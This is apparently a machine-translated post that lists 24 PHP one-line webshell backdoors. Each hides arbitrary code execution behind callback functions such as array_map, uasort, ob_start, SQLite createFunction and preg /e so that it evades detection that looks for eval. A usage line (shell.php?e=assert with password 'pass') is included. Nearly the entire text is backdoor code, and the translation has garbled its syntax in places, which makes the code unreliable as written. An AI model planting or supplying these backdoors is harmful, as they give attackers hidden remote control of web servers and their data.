Share some words that do not require dynamic functions, no eval, no sensitive functions, no kill, no interception. (a few words need php5.4.8+, or sqlite/pdo/yaml/memcached extension, etc.) principle: https://www.leavesongs.com/PENETRATION/ Php-callback-backdoor.html all the words are used basically:/http target/shell.php?e=assert Password pass 01
$e = $_request[' E '];
$arr = Array ($_post[' pass ');
Array_filter ($arr, $e);
02
$e = $_request[' E '];
$arr = Array ($_post[' pass ');
Array_map ($e, $arr);
03
$e = $_request[' E '];
$arr = Array (' Test ', $_request[' pass ');
Uasort ($arr, $e);
04
$e = $_request[' E '];
$arr = Array (' Test ' = 1, $_request[' pass ') + 2);
Uksort ($arr, $e);
05
$arr = new Arrayobject (Array (' Test ', $_request[' Pass '));
$arr->uasort (' assert ');
06
$arr = new Arrayobject (Array (' Test ' = 1, $_request[' pass ') + 2));
$arr->uksort (' assert ');
07
$e = $_request[' E '];
$arr = Array (1);
Array_reduce ($arr, $e, $_post[' Pass ');
08
$e = $_request[' E '];
$arr = Array ($_post[' pass ');
$arr 2 = array (1);
Array_udiff ($arr, $arr 2, $e);
09
$e = $_request[' E '];
$arr = Array ($_post[' pass ') = |. *|e ',);
Array_walk ($arr, $e, ');
10
$e = $_request[' E '];
$arr = Array ($_post[' pass ') = |. *|e ',);
Array_walk_recursive ($arr, $e, ');
11
mb_ereg_replace ('. * ', $_request[' Pass '), ' ', ' e ');
12
echo preg_filter (' |. *|e ', $_request[' Pass '], ');
13
Ob_start (' assert ');
echo $_request[' pass ';
Ob_end_flush ();
14
$e = $_request[' E '];
Register_shutdown_function ($e, $_request[' Pass ');
15
$e = $_request[' E '];
Declare (Ticks=1);
Register_tick_function ($e, $_request[' Pass ');
16
Filter_var ($_request[' Pass '), Filter_callback, Array (' options ' = ' assert ');
17
filter_var_array (' Test ' = ' $_request[' pass '), array (' test ' = = Array (' filter ' = = Filter_callback, ' Options ' = ' assert '));
18
$e = $_request[' E '];
$db = new PDO (' sqlite:sqlite.db3 ');
$db->sqlitecreatefunction (' MyFunc ', $e, 1);
$sth = $db->prepare ("Select MyFunc (: exec)");
$sth->execute (Array (': exec ' = ' $_request[' pass '));
19
$e = $_request[' E '];
$db = new SQLite3 (' sqlite.db3 ');
$db->createfunction (' MyFunc ', $e);
$stmt = $db->prepare ("Select MyFunc (?)");
$stmt->bindvalue (1, $_request[' Pass '), Sqlite3_text);
$stmt->execute ();
20
$str = UrlEncode ($_request[' Pass ');
$yaml = <<<eod
Greeting:! {$STR} "|. +|e "
EOD;
$parsed = Yaml_parse ($yaml, 0, $cnt, array ("!{ $_request[' Pass '} "= = ' preg_replace '));
21st
$mem = new Memcache ();
$re = $mem->addserver (' localhost ', 11211, True, 0,-1, True, create_function (' $a, $b, $c, $d, $e ', ' return assert ($a) ;‘));
$mem->connect ($_request[' Pass '), 11211, 0);
22
preg_replace_callback ('/.+/i ', create_function (' $arr ', ' Return assert ' ($arr [0]); '), $_request[' Pass ');
23
Mb_ereg_replace_callback ('. + ', create_function (' $arr ', ' Return assert ' ($arr [0]); '), $_request[' Pass ');
24
$iterator = new Callbackfilteriterator (new Arrayiterator (Array ($_request[' pass ')), create_function (' $a ', ' assert ($ a);
foreach ($iterator as $item) {echo $item;}
Share some non-characteristic php sentence